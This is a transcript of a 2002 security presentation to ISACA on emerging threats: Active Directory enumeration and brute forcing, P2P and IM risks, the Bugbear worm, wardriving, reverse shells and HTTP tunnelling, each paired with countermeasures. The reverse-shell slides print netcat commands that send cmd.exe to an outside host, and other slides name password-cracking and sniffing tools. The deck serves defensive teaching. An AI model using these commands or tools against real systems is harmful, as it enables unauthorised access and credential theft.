Transcript 2002-11-20-ISACA-ModernThreats

Analysts International
Modern Threats to Information
Infrastructure
V1.0 11-20-02
Introductions
• Mark Lachniet from Analysts International,
Sequoia Services Group
• Senior Security Engineer and Security
Services technical lead
• Former I.S. director for Holt Public Schools
• Certified Information Systems Security
Professional (CISSP)
• Microsoft MCSE, Novell Master CNE, Linux
LPI Certified LPIC-1, Check Point Certified
CCSE, TruSecure TICSA, etc.
2
Agenda
•
•
•
•
•
•
•
•
Windows 2000 Active Directory
Peer to Peer file sharing
Instant Messaging
Bug Bear
Wireless
Reverse command shells
HTTP Tunneling / GoToMyPC.com
Round table – Q&A – Brainstorming
3
Active Directory Overview
• Active directory is the directory service for Win2k
• NT 4.0 domains simply did not scale very well in large
organizations, A.D. is distributed
• By default, all of the old NetBIOS stuff is still
running, but there are new capabilities
• Improves management, especially with user and
machine policies, delegation of authority functions,
and integrated software such as Exchange
• Tight integration with DNS (Dynamic DNS)
• Tight integration with LDAP (Lightweight Directory
Access Protocol)
• Integration with Kerberos (Authentication)
4
Hierarchical Directories
5
Pre-Win2k Compatibility Mode
• Is required for a variety of backwards-compatibility
features
• Is probably enabled in your environment unless you
are ALL Windows 2000
• Allows access to all of the information you used to get
via NetBIOS (shares, users, etc.)
• An Active Directory server will emulate a PDC for
Windows NT4 type environments and systems
• If selected, the “everyone” group is given permissions
to read the directory, etc. (just like NT4) and hence
anonymous access is allowed
• Will be required to interoperate with various
products such as UNIX SAMBA, NT4.0 RAS servers,
etc.
6
A.D. Default Configuration
• Logging of A.D. activity is disabled by default
• Also, authenticated users are able to
enumerate the entire directory
• In a large company, you may wish to lock
down your directory so that users in an OU
(such as engineering) cannot enumerate
objects in another OU (such as internal
auditing)
• For details on how to lock down this browsing
of OU’s and A.D. information check out:
www.microsoft.com/serviceproviders/deployme
nt/ SP_AD_Architecture_Configuration.doc
7
A.D. and Security Policies
• Although not discussed in this presentation,
A.D. is the means by which security policy is
passed down to workstations and users
• Policies are based on domain, which may be
an entire A.D. tree or just a sub-component
(the relationship between A.D. and Domains
may be murky at first glance)
• Lots of information is available on the
Internet about the config and use of policies
• I suggest that you refer to the NSA security
guides on this topic:
http://www.nsa.gov/snac/index.html
8
Active Directory - LDAP
• Based on the X.500 Directory Access Protocol, and is
similar to Novell NDS and other X.500 compliant
directories in terms of naming conventions, etc.
• Win2k supports LDAP v2 and v3
• Should be compatible with other LDAP
implementations, both server and client
• Runs on TCP/389 (you should portscan your internal
and external network for this port)
• Uses cleartext authentication by default
• v3 support includes SASL (Simple Authentication
Security Layer) authentication which supports
encryption through NTLM or Kerberos
• Many client applications that access LDAP stores for
passwords can be forced to only use NTLM (this is a
good idea)
9
LDAP Tricks – ADSI Edit
• ADSI Edit allows raw access to the directory – this is
required for complicated operations but is also very
dangerous
• Using the ADSI you can do a large variety of things in
an “easy” way via scripting as well as the editor
• “Active Directory Service Interfaces (ADSI) enable
systems administrators and developers of scripts or
C/C++ applications to easily query for and
manipulate directory service objects.”
• ADSI can access Active Directory, but lots of other
handy stuff as well
• Extensive information on this at Microsoft’s
Developer Network web site (MSDN)
10
LDAP Tricks – ADSI Scripting
• ADSI supports many scripting capabilities:
– Enumerating objects, finding information
– Adding users, creating custom objects (such as an
object that shows the time of last backup)
– Finding users with specific criteria:
•
•
•
•
Account disabled
Intruder lockout
Password not required
Password can’t change
– Also the ability to *SET* information
• “un-lockout” an account (handy for brute forcing a
password on a specific account, isn’t it?)
• Add/remove users from group (add as an admin, run a
command, remove user again!)
11
LDAP Brute Force Attacks
• http://www.phenoelit.de/kold/download.html
• Specifically designed to attack LDAP, with support
for Active Directory on Windows 2000
• Can be used to enumerate all ID’s found in the
directory and brute force attack them with words
from a dictionary file
• Can use an anonymous connection, or log in using a
given user ID and password
• Account lockout / logging of LDAP attacks (brute
force, etc) may be an issue that needs more research
• Phenoelit also has “lumberjack” which will do off-line
hacking of LDAP directories (stored in LDIF format)
12
K0ld Screen Capture
13
Ldapminer.exe on Win2k
• Allows full enumeration of the data contained
within LDAP (Active Directory)
• Can dump all of the data discovered to a text
file for later analysis in ldif format (see last
slide – lumberjack)
• Default Windows 2000 configuration will
reveal some useful information:
–
–
–
–
Current system time
X.500 naming (may indicate corporate config)
DNS names and IP addresses (including internal)
If it is a global catalog (implies 1st AD server but
may have implications for Exchange or other
penetration testing)
14
A.D. and L0phtCrack
• L0phtCrack *will* work on Windows 2000 Active
Directory information
• Uses PWDUMP3 to extract the hashes, as long as you
have admin access
• Can access the hashes across the network, and may
not require physical access
• All of your favorite auditing tricks should still work
fine with L0phtCrack, but you will need admin access
• One significant change is that it is no longer possible
to steal the entire domain account list by booting to a
floppy disk and grabbing the SAM file from the hard
drive
• One trivia fact – did you know that L0phtCrack
cannot crack high-bit characters (such as ALTKeypad 0,1,2)
15
A.D. and Kerberos
• Kerberos is the updated authentication system for
Windows 2000
• Kerberos is an open standard, and other
implementations exist (and are somewhat compatible
with Win2k)
• Windows 2000 clients will attempt to use Kerberos by
default, and will downgrade to lesser authentication
systems (such as NTLMv2) if there are problems
• In Kerberos, a “realm” is a logical network boundry,
which correlates 1:1 with a Windows domain.
• This means that a Kerberos realm does not
necessarily map to an Active Directory tree
• Be aware of this relationship, especially if you
interoperate with UNIX systems, etc.
16
A.D. and Dynamic DNS
• Windows Active Directory relies on Dynamic DNS
• There is a logical link between DNS naming and the
directory structure
• Windows 2000 clients will update their DNS name (e.g.
workstation.isaca.org) with their current IP address by
means of the DHCP client service
• Dynamic DNS supports secure and insecure modes – if you
rely on DNS naming for important security functions this
should be researched
• Dynamic DNS is handy for auditors to find workstations
in a DHCP environment, but it is also useful for hackers
• One personal observation is that the Dynamic DNS
information is exposed in the LDAP directory, even to
unauthenticated users.
• Also, keep in mind that DNS may allow for zone transfers,
enumeration and other reconnaissance
17
Active Directory Auditing
• You must manually enable logging and auditing
for Active directory
• Enable auditing of all failed accesses of Active
Directory as well as logins, etc.
• For very granular auditing (possibly through
scripts or for troubleshooting purposes) Use
DSACLS and ACLDIAG
• DSACLS.EXE “facilitates management of access
control lists (ACLs) for directory services. DsAcls
enables you to query and manipulate security
attributes on Active Directory objects. It is the
command-line equivalent of the Security page on
various Active Directory snap-in tools”
18
Active Directory Auditing
• With ACLDIAG.EXE you can:
• Compare the ACL on a directory services
object to the permissions defined in the
schema defaults.
• Check or fix standard delegations performed
using templates from the Delegation of
Control wizard in the Active Directory Users
and Computers snap-in, a Windows 2000
administrative tool.
• Get effective permissions granted to a specific
user or group, or to all users and groups that
show up in the ACL.
19
Theoretical Attacks on
Active Directory
• According to the SANS writeup (see references), one
dangerous possibility is embedding binary “blobs” in
the directory that are executed by MMC
• Denial of Service – rapidly changing large numbers of
objects, and then setting them as being high priority
(critical) for replication
• Use of A.D. as Virus distribution system
• Modifying the schema in an inappropriate way
• Deeply nested OU objects?
• Mysterious problems – in testing, my LDAP server
frequently froze up while using standard tools
20
Backing up Active Directory
• In order to have AD security, you should make sure
that it is properly backed up
• Restoring AD can be challenging and complicated –
make sure you have researched it before you try
Backing up the Active Directory also includes backing up system state
data files.
System state data files includes:
–
–
–
–
–
–
–
Active Directory
Certificate services database (if a certificate server)
Class registration (database of information about the component services)
Cluster service (if installed)
Performance counter configuration
Registry
Sysvol (shared folder that contains group policy templates, and login
scripts)
– System startup files.
21
Active Directory References
• SecurityFocus article on A.D:
http://online.securityfocus.com/infocus/1292
http://online.securityfocus.com/infocus/1293
http://online.securityfocus.com/infocus/1470
http://online.securityfocus.com/infocus/1509
http://online.securityfocus.com/infocus/1535
• Preventing L0phtCrack attacks on A.D
http://rr.sans.org/win2000/l0phtcrack.php
22
More A.D. References
• A comparison of NT4 domains and Win2k A.D.
http://www.microsoft.com/mspress/books/sampchap/3173.asp
• How to set up auditing of Active Directory:
http://www.softheap.com/security/audit-active-directory-4.html
• Using LDP to find data in Active Directory
http://support.microsoft.com/default.aspx?scid=KB;enus;q224543
• Discussion on Pre-Windows 2000 Compatibility Mode:
http://support.microsoft.com/default.aspx?scid=KB;enus;q257988
23
Peer to Peer File Sharing
•
•
•
•
•
•
•
•
•
Several different networks and clients:
Aimster
FastTrack
iMesh
Audiogalaxy
MFTP
NeoModus
Gnutella
OpenNap
24
Peer to Peer File Sharing
• The most popular network by far is Gnutella
• Gnutella has many different clients including:
•
•
•
•
•
•
•
•
•
•
BearShare*
Gnucleus
GTK-Gnutella
LimeWire
Mactella
Morpheus*
Phex
Qtella
Shareaza*
XoLoX
• Different clients have different features,
systems and risks
25
P2P File Sharing History
• Napster was the first successful and
important one, but napster made one mistake
• Napster used centralized servers that were
under their control
• Hence the system could be shut down by
going after Napster with legal action
• Newer systems have “master” nodes, but all
they do is maintain lists of other peers out on
the network
• Master nodes are replaceable – you could
start your own P2P network by setting up
your own master servers
26
Napster-Style P2P
• This wasn’t too bad, at least you knew
what to block
27
Gnutella Style P2P
• This is *bad* for you because there is no
single choke point to cut off
28
P2P File Share Features
• Keyword searching
• Rate limiting / Quality of Service (via
bandwidth or simultaneous upload and
download limits)
• Request queuing at the serving host
• Chat facilities
• Use SHA hashes of files to uniquely ID:
– SHA hashes are unique by file
– ID’s files that are the same but have different names
– Allows for “swarm” downloads where parts of the same file
are downloaded from multiple sources simultaneously (cool)
– Allows for file resumption if a source is unavailable (turned
off, hung up, etc.)
– Allows for a patient person to get almost anything they can
find listed
29
Gnutella Communications
• Uses 5 distinct types of protocol messages: ping, pong,
query, query reply, and push
• Use Shareaza to get a good protocol analyzer /
decoder to see them
• Ping and Pong discovery – ask who is out there,
return IP address and amount of shared files
• Query and Query reply – gives search terms
(keywords) and minimum bandwidth requirements.
Reply gives IP address, port, speed, matching files
and GUID of querier
• Querier then connects to the server and attempts to
download the file (this will break if the server is
behind a firewall)
• The Push message is sent if the querier cannot
connect to the server to download the data
30
Push – Firewall Circumvention
• Sends the querier’s IP and port number and asks the
file host to push the file to it – this will bypass a single
firewall in the mix
• If both parties are behind a firewall you are probably
safe… For now…
• How can you stop it? Use a firewall to block *all*
outgoing communications
• Require a proxy server to mediate all requests
outwards (Squid, MS-PROXY, Border Manager)
• Its only a matter of time before P2P clients can tunnel
within HTTP requests that are “proxy friendly”
• Can already be done with special (but thankfully
complicated) HTTP tunneling software
• For Gnutella, you can block the “root” servers but an
alternate could always be used
31
P2P File Share Security Risks
• Spyware Spyware Spyware!
• Usually no virus scanning is done – you need to do
your own
• Spoofed servers will cough up Trojans for almost any
simple query (like the Benjamin Worm)
• Sharing of more than you intended
• “transit” sharing of naughty files has been hinted at!
• Security holes (intentional or not) in the software
itself
• Program minimizes (not shuts down) when exited
• P2P specific worms (e.g. the “Gnutella Worm”)
• Content problems and liability!
• Bandwidth leeching
32
Future P2P Risks
• A lot of things about P2P are “dicey” but haven’t yet
been exploited
• For example, the GUID is a unique identifies that is
sometimes based on MAC address! (pre win2k it is
said)
• That means that queries can possibly be tracked to a
unique physical workstation
• A monitoring station could also record queries by
GUID/MAC as well as IP address and attempt to
ascertain information about that user (such as sexual
preferences, areas of interest, etc)
• Great possibility for leveraging P2P network as
Denial of Service zombies by tricking all Gnutella
clients into flooding a host (e.g. whitehouse.gov)
33
P2P “NG” Share Sniffer
• Operates under the creed of “who needs
Napster when you have Windows”
• Scans a subnet for “open” windows shares
and create a database of them
• These open shares are then used as the
storage repositories for various types of files
• This product used to be at sharesniffer.com
but is gone now. I wonder why
• This was allegedly going to be a pay service!
• Due the lack of awareness on the part of home
users, this will probably work quite well
34
Instant Messaging
• IM is everywhere, including my cell phone! (although
I don’t use it)
• Over 81 MILLION users
• Check out:
http://www.infosecuritymag.com/2002/aug/cover.shtml
• Various types of clients: AOL, ICQ, Microsoft .NET
Messenger, Yahoo Messenger, etc.
• Specifically designed to get around firewalls in order
to work
• Require servers for some functions (login, user
lookup) but can talk directly to nodes for some things
(such as file transfers)
35
36
Problems with IM
• Bypasses gateway AntiVirus products
• Typically unencrypted
• Security problems in the software itself -many
previous hacks, probably many more to come
• May allow remote-control of machines inside the
firewall
• Ability to send files, URLs, etc. to individuals
• Hard to stop at the firewall
• Hard to track, log and account for
• No robust authentication systems
• Secure IM costs $$ and may require an ongoing
service contract or your own server
37
Instant Messaging Problems
Case in Point - msgsnarf
• Dug Song released a number of network sniffing tools
at http://monkey.org/~dugsong/dsniff
• These are especially interesting because of their
special features!
• One feature is that it will work on a switch by using
“ARP poisoning” such that even switched networks
are vulnerable to sniffing
• Another feature is the inclusion of application-specific
sniffers such as mailsnarf (all SMTP messages),
webspy (all URLs) and msgsnarf (Instant Message
information)
• This might have a “white-hat” application, actually, if
you need to monitor it
38
IM management Techniques
• Use an IDS to alert you to matching traffic
(and then go gently inform the user)
• Block access to the login servers and ports
(refer to infosecurity magazine’s August issue
for details)
• Tightly control the workstation using imaging
and desktop security products
• Require the use of proxy servers (only works
in some cases – disable CONNECT on proxy)
• Use a specialized product to manage and
control the access such as Akonix – this
product can log and control IM and P2P
software
39
Bug Bear
• Known as W32.Bugbear or I-Worm.Tanatos
• Some key subject lines:
–
–
–
–
“bad new”
“Membership Confirmation”
“Market Update Report”
“Your Gift”
• Replicates through address book
• Copies itself on available network shares
including printers! (if you see binary garbage
on a printer, this may be a sign)
• Includes Trojan software:
– Disable AntiVirus software
– Built in key-logger
– Back door software
40
Bug Bear
• Exploits an OLD (may 16, 2001) bug in IE and
Outlook, addressed by MS01-027
• Copies several files to the filesystem and then runs
them at each startup by modifying the registry
• HKLM\Software\Microsoft\Windows\CurrentVersion
\RunOnce
• Runs a keylogger that sends all of your keystrokes
(including passwords) to one of 22 different e-mail
addresses
• Creates a trojan / backdoor that runs on port 36794 –
might want to check FW logs for that
• Also has its own web server that it can start up
remotely to abuse a system
41
Wireless
• Yes, wireless is insecure…. Especially anything you
purchased less than 6 months ago and didn’t use
another means of security (like a VPN)
• Until recently, the only security that you could get
from the wireless Access Points (APs) was Wired
Equivalency Protection (WEP)
• WEP comes in 64bit and 128bit security features,
neither of which will do you any good at all if
someone really wants to get you
• Newer products have much better security and
support for better authentication systems (including
bi-directional authentication to minimize the risk of
“rogue” access points)
42
Wireless
• Wardriving – people thing its fun, its cheap,
and in some cases a sport
• Wireless leaks – connections can be made
from physical locations outside of your
control by using special hardware and
software
• Omnidirectional magnetic-mount antennas,
directional antennas, and even pringles cans
do a pretty good job of picking up signals you
never thought possible
• Not only can anyone find your network, but
they can (probably) tell what your SSID is, if
you use WEP, and what vendor your
equipment is
43
Wireless
• Above and beyond that, modern software
integrates with a GPS over a serial port to
record the longitude and latitude of your AP
• When posted on the internet, your dirty
laundry is aired out for all to see
• Check out http://www.netstumbler.com for
lots of great information
• Try it out yourself, you may be surprised
• War driving is not, in itself, illegal! However,
if you ever use an AP without permission, that
is over the line.
44
From Work to Home
9 Access Points in 15 Minutes
45
Wireless Security Measures
• There are many things you can do
• Put access points on a special DMZ segment on a
firewall and restrict traffic
• Require users to use a VPN client to access internal
resources
• Use a modern authentication system such as 802.1X
(in Windows XP) and/or LEAP
• These systems can require a successful authentication
(for example to a Radius server) before allowing a
user to associate with an access point
• Can also require MUTUAL authentication between
the AP and client in addition to user authentication
• If this didn’t exist, you could use a MitM (Man in the
Middle) attack to get auth info by setting up your
own “rogue” AP
46
Wireless Security Measures
• Regularly scan and war-drive your own
facilities and companies
• Consider tuning an IDS for wireless attack
signatures (there was a recent article on this)
• Consider putting up a wireless honeypot
system
• Consider using a wireless “flooding” system
that sends out huge quantities of random
Access Point information to confuse (and
delight) War Drivers
47
Reverse Command Shells
• One would think that if you block all
incoming access, it should be impossible to
access internal systems
• This is only partially true, because it assumes
that the client is honest
• With P2P, IM and everything else, this is
clearly not the case any more – we cannot
trust our users to be security minded
• Reverse command shells, e.g. the NetCat
attack are particularly scary
• Using a utility program such as NetCat, even
a Windows server can be accessed from an
outside server
48
How Reverse Shells Work
• Imagine the above scenario. Lachniet.com cannot hit
anything on the inside network directly because you
have a firewall, a 10.X network, and no direct
Network Address Translation but the client has
Internet access
49
How Reverse Shells Work
• Hacker runs NetCat in Listen mode on port 8080 on
lachniet.com (netcat –l –p 8080)
• Client runs NetCat with an argument of cmd.exe and directs all
output to lachniet.com port 8080 (nc –e cmd.exe lachniet.com
8080)
50
How Reverse Shells Work
• The result – full access as logged in user
• To stop it – no outgoing access!
• Except by proxy server
51
HTTP Tunneling
• It used to be that a firewall, when properly
configured, would stop clients from doing naughty
things (like reverse command shells)
• Ideally we would block all outgoing access, and allow
only web access through a HTTP proxy server
• This is all well and good, but it is also possible to
encapsulate non-HTTP data inside of HTTP requests
and data, and then pass that data down to lower
layers of the OSI model
• In this way, even the most paranoid countermeasures
can be circumvented including a restrictive firewall
and a proxy server
• Technically speaking, it looks something like this:
52
HTTP Tunneling in Practice
• Client wants to run a P2P file sharing client
• Dotted lines are HTTP traffic, Solid line is TCP
53
GoToMyPC.com
• Basically the same thing, except you are using
a pay service for your HTTP tunnel
termination
• The service also acts as a broker for who can
connect to your PC
• Hopefully this broker is working properly and
the average hacker CANNOT connect to your
PC (note that I have seen some discussion of
WebEx conferencing having vulnerabilities
along these lines)
• You also get more control and presumably
security through SSL, reporting, users and
groups and such
54
HTTP Tunneling Counter-measures
• Block *all* outgoing traffic at a firewall, and require all
traffic to go through a proxy server
• Use a firewall with strict RFC compliance (I heard of some
reported success with Raptor/Symantec?)
• Make sure your proxy server doesn’t allow the CONNECT
verb
• Configure an IDS to sense certain types of HTTP
tunneling signatures (RealSecure can detect gotomypc.com
traffic signatures)
• Block all known destination servers such as those from the
gotomypc.com service
• Carefully review your firewall and proxy server logs! If
you see a large amount of HTTP activity going to a single
host (especially one that doesn’t seem legit) check it out –
go browse it yourself
• Log review may be your only recourse!
55
Q&A and Brainstorming
Mark Lachniet, Sr. Security Engineer
CISSP, MCNE, MCSE, CCSE, LPIC-1, TICSA
Analysts International - Sequoia Services
3101 Technology Blvd. Suite A
Lansing, MI 48910
phone: 517.336.1004
fax: 517.336.1004
56